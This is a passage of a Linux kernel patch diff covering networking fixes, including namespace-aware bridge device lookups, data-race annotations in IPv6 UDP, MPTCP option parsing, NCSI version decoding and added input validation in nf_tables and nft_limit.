+ void nf_send_reset6(struct net *net, struct sock *sk, struct sk_buff *oldskb,
+ 		    int hook)
+ {
+-	struct net_device *br_indev __maybe_unused;
+ 	struct sk_buff *nskb;
+ 	struct tcphdr _otcph;
+ 	const struct tcphdr *otcph;
+@@ -353,9 +352,15 @@ void nf_send_reset6(struct net *net, struct sock *sk, struct sk_buff *oldskb,
+ 	 * build the eth header using the original destination's MAC as the
+ 	 * source, and send the RST packet directly.
+ 	 */
+-	br_indev = nf_bridge_get_physindev(oldskb);
+-	if (br_indev) {
++	if (nf_bridge_info_exists(oldskb)) {
+ 		struct ethhdr *oeth = eth_hdr(oldskb);
++		struct net_device *br_indev;
++
++		br_indev = nf_bridge_get_physindev(oldskb, net);
++		if (!br_indev) {
++			kfree_skb(nskb);
++			return;
++		}
+ 
+ 		nskb->dev = br_indev;
+ 		nskb->protocol = htons(ETH_P_IPV6);
+diff --git a/net/ipv6/udp.c b/net/ipv6/udp.c
+index 961106eda69d0..c2c02dea6c386 100644
+--- a/net/ipv6/udp.c
++++ b/net/ipv6/udp.c
+@@ -1152,7 +1152,7 @@ static void udp_v6_flush_pending_frames(struct sock *sk)
+ 		udp_flush_pending_frames(sk);
+ 	else if (up->pending) {
+ 		up->len = 0;
+-		up->pending = 0;
++		WRITE_ONCE(up->pending, 0);
+ 		ip6_flush_pending_frames(sk);
+ 	}
+ }
+@@ -1330,7 +1330,7 @@ static int udp_v6_push_pending_frames(struct sock *sk)
+ 			      &inet_sk(sk)->cork.base);
+ out:
+ 	up->len = 0;
+-	up->pending = 0;
++	WRITE_ONCE(up->pending, 0);
+ 	return err;
+ }
+ 
+@@ -1387,7 +1387,7 @@ int udpv6_sendmsg(struct sock *sk, struct msghdr *msg, size_t len)
+ 		default:
+ 			return -EINVAL;
+ 		}
+-	} else if (!up->pending) {
++	} else if (!READ_ONCE(up->pending)) {
+ 		if (sk->sk_state != TCP_ESTABLISHED)
+ 			return -EDESTADDRREQ;
+ 		daddr = &sk->sk_v6_daddr;
+@@ -1418,8 +1418,8 @@ do_udp_sendmsg:
+ 		return -EMSGSIZE;
+ 
+ 	getfrag  =  is_udplite ?  udplite_getfrag : ip_generic_getfrag;
+-	if (up->pending) {
+-		if (up->pending == AF_INET)
++	if (READ_ONCE(up->pending)) {
++		if (READ_ONCE(up->pending) == AF_INET)
+ 			return udp_sendmsg(sk, msg, len);
+ 		/*
+ 		 * There are pending frames.
+@@ -1609,7 +1609,7 @@ back_from_confirm:
+ 		goto out;
+ 	}
+ 
+-	up->pending = AF_INET6;
++	WRITE_ONCE(up->pending, AF_INET6);
+ 
+ do_append_data:
+ 	if (ipc6.dontfrag < 0)
+@@ -1623,7 +1623,7 @@ do_append_data:
+ 	else if (!corkreq)
+ 		err = udp_v6_push_pending_frames(sk);
+ 	else if (unlikely(skb_queue_empty(&sk->sk_write_queue)))
+-		up->pending = 0;
++		WRITE_ONCE(up->pending, 0);
+ 
+ 	if (err > 0)
+ 		err = np->recverr ? net_xmit_errno(err) : 0;
+@@ -1663,7 +1663,7 @@ static void udpv6_splice_eof(struct socket *sock)
+ 	struct sock *sk = sock->sk;
+ 	struct udp_sock *up = udp_sk(sk);
+ 
+-	if (!up->pending || udp_test_bit(CORK, sk))
++	if (!READ_ONCE(up->pending) || udp_test_bit(CORK, sk))
+ 		return;
+ 
+ 	lock_sock(sk);
+diff --git a/net/mptcp/options.c b/net/mptcp/options.c
+index 74027bb5b4296..a718ebcb5bc63 100644
+--- a/net/mptcp/options.c
++++ b/net/mptcp/options.c
+@@ -118,8 +118,8 @@ static void mptcp_parse_option(const struct sk_buff *skb,
+ 		break;
+ 
+ 	case MPTCPOPT_MP_JOIN:
+-		mp_opt->suboptions |= OPTIONS_MPTCP_MPJ;
+ 		if (opsize == TCPOLEN_MPTCP_MPJ_SYN) {
++			mp_opt->suboptions |= OPTION_MPTCP_MPJ_SYN;
+ 			mp_opt->backup = *ptr++ & MPTCPOPT_BACKUP;
+ 			mp_opt->join_id = *ptr++;
+ 			mp_opt->token = get_unaligned_be32(ptr);
+@@ -130,6 +130,7 @@ static void mptcp_parse_option(const struct sk_buff *skb,
+ 				 mp_opt->backup, mp_opt->join_id,
+ 				 mp_opt->token, mp_opt->nonce);
+ 		} else if (opsize == TCPOLEN_MPTCP_MPJ_SYNACK) {
++			mp_opt->suboptions |= OPTION_MPTCP_MPJ_SYNACK;
+ 			mp_opt->backup = *ptr++ & MPTCPOPT_BACKUP;
+ 			mp_opt->join_id = *ptr++;
+ 			mp_opt->thmac = get_unaligned_be64(ptr);
+@@ -140,11 +141,10 @@ static void mptcp_parse_option(const struct sk_buff *skb,
+ 				 mp_opt->backup, mp_opt->join_id,
+ 				 mp_opt->thmac, mp_opt->nonce);
+ 		} else if (opsize == TCPOLEN_MPTCP_MPJ_ACK) {
++			mp_opt->suboptions |= OPTION_MPTCP_MPJ_ACK;
+ 			ptr += 2;
+ 			memcpy(mp_opt->hmac, ptr, MPTCPOPT_HMAC_LEN);
+ 			pr_debug("MP_JOIN hmac");
+-		} else {
+-			mp_opt->suboptions &= ~OPTIONS_MPTCP_MPJ;
+ 		}
+ 		break;
+ 
+diff --git a/net/mptcp/subflow.c b/net/mptcp/subflow.c
+index 8ed7769cae836..45d20e20cfc00 100644
+--- a/net/mptcp/subflow.c
++++ b/net/mptcp/subflow.c
+@@ -156,8 +156,8 @@ static int subflow_check_req(struct request_sock *req,
+ 
+ 	mptcp_get_options(skb, &mp_opt);
+ 
+-	opt_mp_capable = !!(mp_opt.suboptions & OPTIONS_MPTCP_MPC);
+-	opt_mp_join = !!(mp_opt.suboptions & OPTIONS_MPTCP_MPJ);
++	opt_mp_capable = !!(mp_opt.suboptions & OPTION_MPTCP_MPC_SYN);
++	opt_mp_join = !!(mp_opt.suboptions & OPTION_MPTCP_MPJ_SYN);
+ 	if (opt_mp_capable) {
+ 		SUBFLOW_REQ_INC_STATS(req, MPTCP_MIB_MPCAPABLEPASSIVE);
+ 
+@@ -253,8 +253,8 @@ int mptcp_subflow_init_cookie_req(struct request_sock *req,
+ 	subflow_init_req(req, sk_listener);
+ 	mptcp_get_options(skb, &mp_opt);
+ 
+-	opt_mp_capable = !!(mp_opt.suboptions & OPTIONS_MPTCP_MPC);
+-	opt_mp_join = !!(mp_opt.suboptions & OPTIONS_MPTCP_MPJ);
++	opt_mp_capable = !!(mp_opt.suboptions & OPTION_MPTCP_MPC_ACK);
++	opt_mp_join = !!(mp_opt.suboptions & OPTION_MPTCP_MPJ_ACK);
+ 	if (opt_mp_capable && opt_mp_join)
+ 		return -EINVAL;
+ 
+@@ -415,7 +415,7 @@ static void subflow_finish_connect(struct sock *sk, const struct sk_buff *skb)
+ 
+ 	mptcp_get_options(skb, &mp_opt);
+ 	if (subflow->request_mptcp) {
+-		if (!(mp_opt.suboptions & OPTIONS_MPTCP_MPC)) {
++		if (!(mp_opt.suboptions & OPTION_MPTCP_MPC_SYNACK)) {
+ 			MPTCP_INC_STATS(sock_net(sk),
+ 					MPTCP_MIB_MPCAPABLEACTIVEFALLBACK);
+ 			mptcp_do_fallback(sk);
+@@ -438,7 +438,7 @@ static void subflow_finish_connect(struct sock *sk, const struct sk_buff *skb)
+ 	} else if (subflow->request_join) {
+ 		u8 hmac[SHA256_DIGEST_SIZE];
+ 
+-		if (!(mp_opt.suboptions & OPTIONS_MPTCP_MPJ)) {
++		if (!(mp_opt.suboptions & OPTION_MPTCP_MPJ_SYNACK)) {
+ 			subflow->reset_reason = MPTCP_RST_EMPTCP;
+ 			goto do_reset;
+ 		}
+@@ -713,12 +713,13 @@ static struct sock *subflow_syn_recv_sock(const struct sock *sk,
+ 		 * options.
+ 		 */
+ 		mptcp_get_options(skb, &mp_opt);
+-		if (!(mp_opt.suboptions & OPTIONS_MPTCP_MPC))
++		if (!(mp_opt.suboptions &
++		      (OPTION_MPTCP_MPC_SYN | OPTION_MPTCP_MPC_ACK)))
+ 			fallback = true;
+ 
+ 	} else if (subflow_req->mp_join) {
+ 		mptcp_get_options(skb, &mp_opt);
+-		if (!(mp_opt.suboptions & OPTIONS_MPTCP_MPJ) ||
++		if (!(mp_opt.suboptions & OPTION_MPTCP_MPJ_ACK) ||
+ 		    !subflow_hmac_valid(req, &mp_opt) ||
+ 		    !mptcp_can_accept_new_subflow(subflow_req->msk)) {
+ 			SUBFLOW_REQ_INC_STATS(req, MPTCP_MIB_JOINACKMAC);
+diff --git a/net/ncsi/internal.h b/net/ncsi/internal.h
+index 03757e76bb6b9..374412ed780b6 100644
+--- a/net/ncsi/internal.h
++++ b/net/ncsi/internal.h
+@@ -105,8 +105,11 @@ enum {
+ 
+ 
+ struct ncsi_channel_version {
+-	u32 version;		/* Supported BCD encoded NCSI version */
+-	u32 alpha2;		/* Supported BCD encoded NCSI version */
++	u8   major;		/* NCSI version major */
++	u8   minor;		/* NCSI version minor */
++	u8   update;		/* NCSI version update */
++	char alpha1;		/* NCSI version alpha1 */
++	char alpha2;		/* NCSI version alpha2 */
+ 	u8  fw_name[12];	/* Firmware name string                */
+ 	u32 fw_version;		/* Firmware version                   */
+ 	u16 pci_ids[4];		/* PCI identification                 */
+diff --git a/net/ncsi/ncsi-netlink.c b/net/ncsi/ncsi-netlink.c
+index d27f4eccce6d7..fe681680b5d91 100644
+--- a/net/ncsi/ncsi-netlink.c
++++ b/net/ncsi/ncsi-netlink.c
+@@ -71,8 +71,8 @@ static int ncsi_write_channel_info(struct sk_buff *skb,
+ 	if (nc == nc->package->preferred_channel)
+ 		nla_put_flag(skb, NCSI_CHANNEL_ATTR_FORCED);
+ 
+-	nla_put_u32(skb, NCSI_CHANNEL_ATTR_VERSION_MAJOR, nc->version.version);
+-	nla_put_u32(skb, NCSI_CHANNEL_ATTR_VERSION_MINOR, nc->version.alpha2);
++	nla_put_u32(skb, NCSI_CHANNEL_ATTR_VERSION_MAJOR, nc->version.major);
++	nla_put_u32(skb, NCSI_CHANNEL_ATTR_VERSION_MINOR, nc->version.minor);
+ 	nla_put_string(skb, NCSI_CHANNEL_ATTR_VERSION_STR, nc->version.fw_name);
+ 
+ 	vid_nest = nla_nest_start_noflag(skb, NCSI_CHANNEL_ATTR_VLAN_LIST);
+diff --git a/net/ncsi/ncsi-pkt.h b/net/ncsi/ncsi-pkt.h
+index ba66c7dc3a216..c9d1da34dc4dc 100644
+--- a/net/ncsi/ncsi-pkt.h
++++ b/net/ncsi/ncsi-pkt.h
+@@ -197,9 +197,12 @@ struct ncsi_rsp_gls_pkt {
+ /* Get Version ID */
+ struct ncsi_rsp_gvi_pkt {
+ 	struct ncsi_rsp_pkt_hdr rsp;          /* Response header */
+-	__be32                  ncsi_version; /* NCSI version    */
++	unsigned char           major;        /* NCSI version major */
++	unsigned char           minor;        /* NCSI version minor */
++	unsigned char           update;       /* NCSI version update */
++	unsigned char           alpha1;       /* NCSI version alpha1 */
+ 	unsigned char           reserved[3];  /* Reserved        */
+-	unsigned char           alpha2;       /* NCSI version    */
++	unsigned char           alpha2;       /* NCSI version alpha2 */
+ 	unsigned char           fw_name[12];  /* f/w name string */
+ 	__be32                  fw_version;   /* f/w version     */
+ 	__be16                  pci_ids[4];   /* PCI IDs         */
+diff --git a/net/ncsi/ncsi-rsp.c b/net/ncsi/ncsi-rsp.c
+index 069c2659074bc..480e80e3c2836 100644
+--- a/net/ncsi/ncsi-rsp.c
++++ b/net/ncsi/ncsi-rsp.c
+@@ -19,6 +19,19 @@
+ #include "ncsi-pkt.h"
+ #include "ncsi-netlink.h"
+ 
++/* Nibbles within [0xA, 0xF] add zero "0" to the returned value.
++ * Optional fields (encoded as 0xFF) will default to zero.
++ */
++static u8 decode_bcd_u8(u8 x)
++{
++	int lo = x & 0xF;
++	int hi = x >> 4;
++
++	lo = lo < 0xA ? lo : 0;
++	hi = hi < 0xA ? hi : 0;
++	return lo + hi * 10;
++}
++
+ static int ncsi_validate_rsp_pkt(struct ncsi_request *nr,
+ 				 unsigned short payload)
+ {
+@@ -755,9 +768,18 @@ static int ncsi_rsp_handler_gvi(struct ncsi_request *nr)
+ 	if (!nc)
+ 		return -ENODEV;
+ 
+-	/* Update to channel's version info */
++	/* Update channel's version info
++	 *
++	 * Major, minor, and update fields are supposed to be
++	 * unsigned integers encoded as packed BCD.
++	 *
++	 * Alpha1 and alpha2 are ISO/IEC 8859-1 characters.
++	 */
+ 	ncv = &nc->version;
+-	ncv->version = ntohl(rsp->ncsi_version);
++	ncv->major = decode_bcd_u8(rsp->major);
++	ncv->minor = decode_bcd_u8(rsp->minor);
++	ncv->update = decode_bcd_u8(rsp->update);
++	ncv->alpha1 = rsp->alpha1;
+ 	ncv->alpha2 = rsp->alpha2;
+ 	memcpy(ncv->fw_name, rsp->fw_name, 12);
+ 	ncv->fw_version = ntohl(rsp->fw_version);
+diff --git a/net/netfilter/ipset/ip_set_hash_netiface.c b/net/netfilter/ipset/ip_set_hash_netiface.c
+index 0310732862362..bf1a3851ba5a7 100644
+--- a/net/netfilter/ipset/ip_set_hash_netiface.c
++++ b/net/netfilter/ipset/ip_set_hash_netiface.c
+@@ -138,9 +138,9 @@ hash_netiface4_data_next(struct hash_netiface4_elem *next,
+ #include "ip_set_hash_gen.h"
+ 
+ #if IS_ENABLED(CONFIG_BRIDGE_NETFILTER)
+-static const char *get_physindev_name(const struct sk_buff *skb)
++static const char *get_physindev_name(const struct sk_buff *skb, struct net *net)
+ {
+-	struct net_device *dev = nf_bridge_get_physindev(skb);
++	struct net_device *dev = nf_bridge_get_physindev(skb, net);
+ 
+ 	return dev ? dev->name : NULL;
+ }
+@@ -177,7 +177,7 @@ hash_netiface4_kadt(struct ip_set *set, const struct sk_buff *skb,
+ 
+ 	if (opt->cmdflags & IPSET_FLAG_PHYSDEV) {
+ #if IS_ENABLED(CONFIG_BRIDGE_NETFILTER)
+-		const char *eiface = SRCDIR ? get_physindev_name(skb) :
++		const char *eiface = SRCDIR ? get_physindev_name(skb, xt_net(par)) :
+ 					      get_physoutdev_name(skb);
+ 
+ 		if (!eiface)
+@@ -395,7 +395,7 @@ hash_netiface6_kadt(struct ip_set *set, const struct sk_buff *skb,
+ 
+ 	if (opt->cmdflags & IPSET_FLAG_PHYSDEV) {
+ #if IS_ENABLED(CONFIG_BRIDGE_NETFILTER)
+-		const char *eiface = SRCDIR ? get_physindev_name(skb) :
++		const char *eiface = SRCDIR ? get_physindev_name(skb, xt_net(par)) :
+ 					      get_physoutdev_name(skb);
+ 
+ 		if (!eiface)
+diff --git a/net/netfilter/ipvs/ip_vs_xmit.c b/net/netfilter/ipvs/ip_vs_xmit.c
+index b452eb3ddcecb..d40a4ca2b27f5 100644
+--- a/net/netfilter/ipvs/ip_vs_xmit.c
++++ b/net/netfilter/ipvs/ip_vs_xmit.c
+@@ -271,7 +271,7 @@ static inline bool decrement_ttl(struct netns_ipvs *ipvs,
+ 			skb->dev = dst->dev;
+ 			icmpv6_send(skb, ICMPV6_TIME_EXCEED,
+ 				    ICMPV6_EXC_HOPLIMIT, 0);
+-			__IP6_INC_STATS(net, idev, IPSTATS_MIB_INHDRERRORS);
++			IP6_INC_STATS(net, idev, IPSTATS_MIB_INHDRERRORS);
+ 
+ 			return false;
+ 		}
+@@ -286,7 +286,7 @@ static inline bool decrement_ttl(struct netns_ipvs *ipvs,
+ 	{
+ 		if (ip_hdr(skb)->ttl <= 1) {
+ 			/* Tell the sender its packet died... */
+-			__IP_INC_STATS(net, IPSTATS_MIB_INHDRERRORS);
++			IP_INC_STATS(net, IPSTATS_MIB_INHDRERRORS);
+ 			icmp_send(skb, ICMP_TIME_EXCEEDED, ICMP_EXC_TTL, 0);
+ 			return false;
+ 		}
+diff --git a/net/netfilter/nf_log_syslog.c b/net/netfilter/nf_log_syslog.c
+index c66689ad2b491..58402226045e8 100644
+--- a/net/netfilter/nf_log_syslog.c
++++ b/net/netfilter/nf_log_syslog.c
+@@ -111,7 +111,8 @@ nf_log_dump_packet_common(struct nf_log_buf *m, u8 pf,
+ 			  unsigned int hooknum, const struct sk_buff *skb,
+ 			  const struct net_device *in,
+ 			  const struct net_device *out,
+-			  const struct nf_loginfo *loginfo, const char *prefix)
++			  const struct nf_loginfo *loginfo, const char *prefix,
++			  struct net *net)
+ {
+ 	const struct net_device *physoutdev __maybe_unused;
+ 	const struct net_device *physindev __maybe_unused;
+@@ -121,7 +122,7 @@ nf_log_dump_packet_common(struct nf_log_buf *m, u8 pf,
+ 			in ? in->name : "",
+ 			out ? out->name : "");
+ #if IS_ENABLED(CONFIG_BRIDGE_NETFILTER)
+-	physindev = nf_bridge_get_physindev(skb);
++	physindev = nf_bridge_get_physindev(skb, net);
+ 	if (physindev && in != physindev)
+ 		nf_log_buf_add(m, "PHYSIN=%s ", physindev->name);
+ 	physoutdev = nf_bridge_get_physoutdev(skb);
+@@ -148,7 +149,7 @@ static void nf_log_arp_packet(struct net *net, u_int8_t pf,
+ 		loginfo = &default_loginfo;
+ 
+ 	nf_log_dump_packet_common(m, pf, hooknum, skb, in, out, loginfo,
+-				  prefix);
++				  prefix, net);
+ 	dump_arp_packet(m, loginfo, skb, skb_network_offset(skb));
+ 
+ 	nf_log_buf_close(m);
+@@ -845,7 +846,7 @@ static void nf_log_ip_packet(struct net *net, u_int8_t pf,
+ 		loginfo = &default_loginfo;
+ 
+ 	nf_log_dump_packet_common(m, pf, hooknum, skb, in,
+-				  out, loginfo, prefix);
++				  out, loginfo, prefix, net);
+ 
+ 	if (in)
+ 		dump_mac_header(m, loginfo, skb);
+@@ -880,7 +881,7 @@ static void nf_log_ip6_packet(struct net *net, u_int8_t pf,
+ 		loginfo = &default_loginfo;
+ 
+ 	nf_log_dump_packet_common(m, pf, hooknum, skb, in, out,
+-				  loginfo, prefix);
++				  loginfo, prefix, net);
+ 
+ 	if (in)
+ 		dump_mac_header(m, loginfo, skb);
+@@ -916,7 +917,7 @@ static void nf_log_unknown_packet(struct net *net, u_int8_t pf,
+ 		loginfo = &default_loginfo;
+ 
+ 	nf_log_dump_packet_common(m, pf, hooknum, skb, in, out, loginfo,
+-				  prefix);
++				  prefix, net);
+ 
+ 	dump_mac_header(m, loginfo, skb);
+ 
+diff --git a/net/netfilter/nf_queue.c b/net/netfilter/nf_queue.c
+index 63d1516816b1f..e2f334f70281f 100644
+--- a/net/netfilter/nf_queue.c
++++ b/net/netfilter/nf_queue.c
+@@ -82,11 +82,9 @@ static void __nf_queue_entry_init_physdevs(struct nf_queue_entry *entry)
+ {
+ #if IS_ENABLED(CONFIG_BRIDGE_NETFILTER)
+ 	const struct sk_buff *skb = entry->skb;
+-	struct nf_bridge_info *nf_bridge;
+ 
+-	nf_bridge = nf_bridge_info_get(skb);
+-	if (nf_bridge) {
+-		entry->physin = nf_bridge_get_physindev(skb);
++	if (nf_bridge_info_exists(skb)) {
++		entry->physin = nf_bridge_get_physindev(skb, entry->state.net);
+ 		entry->physout = nf_bridge_get_physoutdev(skb);
+ 	} else {
+ 		entry->physin = NULL;
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index 3d6ebb9877a4e..2702294ac46c6 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -4523,8 +4523,8 @@ static int nft_set_desc_concat_parse(const struct nlattr *attr,
+ static int nft_set_desc_concat(struct nft_set_desc *desc,
+ 			       const struct nlattr *nla)
+ {
++	u32 num_regs = 0, key_num_regs = 0;
+ 	struct nlattr *attr;
+-	u32 num_regs = 0;
+ 	int rem, err, i;
+ 
+ 	nla_for_each_nested(attr, nla, rem) {
+@@ -4539,6 +4539,10 @@ static int nft_set_desc_concat(struct nft_set_desc *desc,
+ 	for (i = 0; i < desc->field_count; i++)
+ 		num_regs += DIV_ROUND_UP(desc->field_len[i], sizeof(u32));
+ 
++	key_num_regs = DIV_ROUND_UP(desc->klen, sizeof(u32));
++	if (key_num_regs != num_regs)
++		return -EINVAL;
++
+ 	if (num_regs > NFT_REG32_COUNT)
+ 		return -E2BIG;
+ 
+@@ -4753,16 +4757,28 @@ static int nf_tables_newset(struct sk_buff *skb, const struct nfnl_info *info,
+ 	}
+ 
+ 	desc.policy = NFT_SET_POL_PERFORMANCE;
+-	if (nla[NFTA_SET_POLICY] != NULL)
++	if (nla[NFTA_SET_POLICY] != NULL) {
+ 		desc.policy = ntohl(nla_get_be32(nla[NFTA_SET_POLICY]));
++		switch (desc.policy) {
++		case NFT_SET_POL_PERFORMANCE:
++		case NFT_SET_POL_MEMORY:
++			break;
++		default:
++			return -EOPNOTSUPP;
++		}
++	}
+ 
+ 	if (nla[NFTA_SET_DESC] != NULL) {
+ 		err = nf_tables_set_desc_parse(&desc, nla[NFTA_SET_DESC]);
+ 		if (err < 0)
+ 			return err;
+ 
+-		if (desc.field_count > 1 && !(flags & NFT_SET_CONCAT))
++		if (desc.field_count > 1) {
++			if (!(flags & NFT_SET_CONCAT))
++				return -EINVAL;
++		} else if (flags & NFT_SET_CONCAT) {
+ 			return -EINVAL;
++		}
+ 	} else if (flags & NFT_SET_CONCAT) {
+ 		return -EINVAL;
+ 	}
+@@ -5406,7 +5422,7 @@ static int nf_tables_dump_setelem(const struct nft_ctx *ctx,
+ 	const struct nft_set_ext *ext = nft_set_elem_ext(set, elem->priv);
+ 	struct nft_set_dump_args *args;
+ 
+-	if (nft_set_elem_expired(ext))
++	if (nft_set_elem_expired(ext) || nft_set_elem_is_dead(ext))
+ 		return 0;
+ 
+ 	args = container_of(iter, struct nft_set_dump_args, iter);
+@@ -6152,7 +6168,7 @@ static int nft_setelem_catchall_deactivate(const struct net *net,
+ 
+ 	list_for_each_entry(catchall, &set->catchall_list, list) {
+ 		ext = nft_set_elem_ext(set, catchall->elem);
+-		if (!nft_is_active(net, ext))
++		if (!nft_is_active_next(net, ext))
+ 			continue;
+ 
+ 		kfree(elem->priv);
+@@ -9937,6 +9953,7 @@ static int __nf_tables_abort(struct net *net, enum nfnl_abort_action action)
+ 				nft_trans_destroy(trans);
+ 				break;
+ 			}
++			nft_trans_set(trans)->dead = 1;
+ 			list_del_rcu(&nft_trans_set(trans)->list);
+ 			break;
+ 		case NFT_MSG_DELSET:
+diff --git a/net/netfilter/nfnetlink_log.c b/net/netfilter/nfnetlink_log.c
+index c5ff699e30469..200a82a8f943d 100644
+--- a/net/netfilter/nfnetlink_log.c
++++ b/net/netfilter/nfnetlink_log.c
+@@ -499,7 +499,7 @@ __build_packet_message(struct nfnl_log_net *log,
+ 					 htonl(br_port_get_rcu(indev)->br->dev->ifindex)))
+ 				goto nla_put_failure;
+ 		} else {
+-			struct net_device *physindev;
++			int physinif;
+ 
+ 			/* Case 2: indev is bridge group, we need to look for
+ 			 * physical device (when called from ipv4) */
+@@ -507,10 +507,10 @@ __build_packet_message(struct nfnl_log_net *log,
+ 					 htonl(indev->ifindex)))
+ 				goto nla_put_failure;
+ 
+-			physindev = nf_bridge_get_physindev(skb);
+-			if (physindev &&
++			physinif = nf_bridge_get_physinif(skb);
++			if (physinif &&
+ 			    nla_put_be32(inst->skb, NFULA_IFINDEX_PHYSINDEV,
+-					 htonl(physindev->ifindex)))
++					 htonl(physinif)))
+ 				goto nla_put_failure;
+ 		}
+ #endif
+diff --git a/net/netfilter/nft_limit.c b/net/netfilter/nft_limit.c
+index 981addb2d0515..75c05ef885a91 100644
+--- a/net/netfilter/nft_limit.c
++++ b/net/netfilter/nft_limit.c
+@@ -58,6 +58,7 @@ static inline bool nft_limit_eval(struct nft_limit_priv *priv, u64 cost)
+ static int nft_limit_init(struct nft_limit_priv *priv,
+ 			  const struct nlattr * const tb[], bool pkts)
+ {
++	bool invert = false;
+ 	u64 unit, tokens;
+ 
+ 	if (tb[NFTA_LIMIT_RATE] == NULL ||
+@@ -90,19 +91,23 @@ static int nft_limit_init(struct nft_limit_priv *priv,
+ 				 priv->rate);
+ 	}
+ 
++	if (tb[NFTA_LIMIT_FLAGS]) {
++		u32 flags = ntohl(nla_get_be32(tb[NFTA_LIMIT_FLAGS]));
++
++		if (flags & ~NFT_LIMIT_F_INV)
++			return -EOPNOTSUPP;
++
++		if (flags & NFT_LIMIT_F_INV)
++			invert = true;
++	}
++
+ 	priv->limit = kmalloc(sizeof(*priv->limit), GFP_KERNEL_ACCOUNT);
+ 	if (!priv->limit)
+ 		return -ENOMEM;
+ 
+ 	priv->limit->tokens = tokens;
+ 	priv->tokens_max = priv->limit->tokens;
+-
+-	if (tb[NFTA_LIMIT_FLAGS]) {
+-		u32 flags = ntohl(nla_get_be32(tb[NFTA_LIMIT_FLAGS]));
+-
+-		if (flags & NFT_LIMIT_F_INV)
+-			priv->invert = true;
+-	}
++	priv->invert = invert;
+ 	priv->limit->last = ktime_get_ns();
+ 	spin_lock_init(&priv->limit->lock);
+ 
+diff --git a/net/netfilter/xt_physdev.c b/net/netfilter/xt_physdev.c
+index ec6ed6fda96c5..343e65f377d44 100644
+--- a/net/netfilter/xt_physdev.c
++++ b/net/netfilter/xt_physdev.c
+@@ -59,7 +59,7 @@ physdev_mt(const struct sk_buff *skb, struct xt_action_param *par)
+ 	    (!!outdev ^ !(info->invert & XT_PHYSDEV_OP_BRIDGED)))
+ 		return false;
+ 
+-	physdev = nf_bridge_get_physindev(skb);
++	physdev = nf_bridge_get_physindev(skb, xt_net(par));
+ 	indev = physdev ? physdev->name : NULL;
+ 
+ 	if ((info->bitmask & XT_PHYSDEV_OP_ISIN &&
+diff --git a/net/netlabel/netlabel_calipso.c b/net/netlabel/netlabel_calipso.c
+index f1d5b84652178..a07c2216d28b6 100644
+--- a/net/netlabel/netlabel_calipso.c
++++ b/net/netlabel/netlabel_calipso.c
+@@ -54,6 +54,28 @@ static const struct nla_policy calipso_genl_policy[NLBL_CALIPSO_A_MAX + 1] = {
+ 	[NLBL_CALIPSO_A_MTYPE] = { .type = NLA_U32 },
+ };
+ 
++static const struct netlbl_calipso_ops *calipso_ops;
++
++/**
++ * netlbl_calipso_ops_register - Register the CALIPSO operations
++ * @ops: ops to register
++ *
++ * Description:
++ * Register the CALIPSO packet engine operations.
++ *
++ */
++const struct netlbl_calipso_ops *
++netlbl_calipso_ops_register(const struct netlbl_calipso_ops *ops)
++{
++	return xchg(&calipso_ops, ops);
++}
++EXPORT_SYMBOL(netlbl_calipso_ops_register);
++
++static const struct netlbl_calipso_ops *netlbl_calipso_ops_get(void)
++{
++	return READ_ONCE(calipso_ops);
++}
++
+ /* NetLabel Command Handlers
+  */
+ /**
+@@ -96,15 +118,18 @@ static int netlbl_calipso_add_pass(struct genl_info *info,
+  *
+  */
+ static int netlbl_calipso_add(struct sk_buff *skb, struct genl_info *info)
+-
+ {
+ 	int ret_val = -EINVAL;
+ 	struct netlbl_audit audit_info;
++	const struct netlbl_calipso_ops *ops = netlbl_calipso_ops_get();
+ 
+ 	if (!info->attrs[NLBL_CALIPSO_A_DOI] ||
+ 	    !info->attrs[NLBL_CALIPSO_A_MTYPE])
+ 		return -EINVAL;
+ 
++	if (!ops)
++		return -EOPNOTSUPP;
++
+ 	netlbl_netlink_auditinfo(&audit_info);
+ 	switch (nla_get_u32(info->attrs[NLBL_CALIPSO_A_MTYPE])) {
+ 	case CALIPSO_MAP_PASS:
+@@ -363,28 +388,6 @@ int __init netlbl_calipso_genl_init(void)
+ 	return genl_register_family(&netlbl_calipso_gnl_family);
+ }
+ 
+-static const struct netlbl_calipso_ops *calipso_ops;
+-
+-/**
+- * netlbl_calipso_ops_register - Register the CALIPSO operations
+- * @ops: ops to register
+- *
+- * Description:
+- * Register the CALIPSO packet engine operations.
+- *
+- */
+-const struct netlbl_calipso_ops *
+-netlbl_calipso_ops_register(const struct netlbl_calipso_ops *ops)
+-{
+-	return xchg(&calipso_ops, ops);
+-}
+-EXPORT_SYMBOL(netlbl_calipso_ops_register);
+-
+-static const struct netlbl_calipso_ops *netlbl_calipso_ops_get(void)
+-{
+-	return READ_ONCE(calipso_ops);
+-}
+-
+ /**
+  * calipso_doi_add - Add a new DOI to the CALIPSO protocol engine
+  * @doi_def: the DOI structure
+diff --git a/net/sched/act_ct.c b/net/sched/act_ct.c
+index d6d33f854050a..84e15116f18c2 100644
+--- a/net/sched/act_ct.c
++++ b/net/sched/act_ct.c
+@@ -863,7 +863,6 @@ static int tcf_ct_handle_fragments(struct net *net, struct sk_buff *skb,
+ 	if (err || !frag)
+ 		return err;
+ 
+-	skb_get(skb);
+ 	mru = tc_skb_cb(skb)->mru;
+ 
+ 	if (family == NFPROTO_IPV4) {
+@@ -1150,12 +1149,8 @@ static int tcf_ct_act(struct sk_buff *skb, const struct tc_action *a,
+ 	nh_ofs = skb_network_offset(skb);
+ 	skb_pull_rcsum(skb, nh_ofs);
+ 	err = tcf_ct_handle_fragments(net, skb, family, p->zone, &defrag);
+-	if (err == -EINPROGRESS) {
+-		retval = TC_ACT_STOLEN;
+-		goto out_clear;
+-	}
+ 	if (err)
+-		goto drop;
++		goto out_frag;
+ 
+ 	err = tcf_ct_skb_network_trim(skb, family);
+ 	if (err)
+@@ -1226,6 +1221,11 @@ out_clear:
+ 		qdisc_skb_cb(skb)->pkt_len = skb->len;
+ 	return retval;
+ 
++out_frag:
++	if (err != -EINPROGRESS)
++		tcf_action_inc_drop_qstats(&c->common);
++	return TC_ACT_CONSUMED;
++
+ drop:
+ 	tcf_action_inc_drop_qstats(&c->common);
+ 	return TC_ACT_SHOT;
+diff --git a/net/sctp/socket.c b/net/sctp/socket.c
+index e25dc17091311..237a6b04adf6f 100644
+--- a/net/sctp/socket.c
++++ b/net/sctp/socket.c
+@@ -2098,6 +2098,13 @@ static int sctp_recvmsg(struct sock *sk, struct msghdr *msg, size_t len,
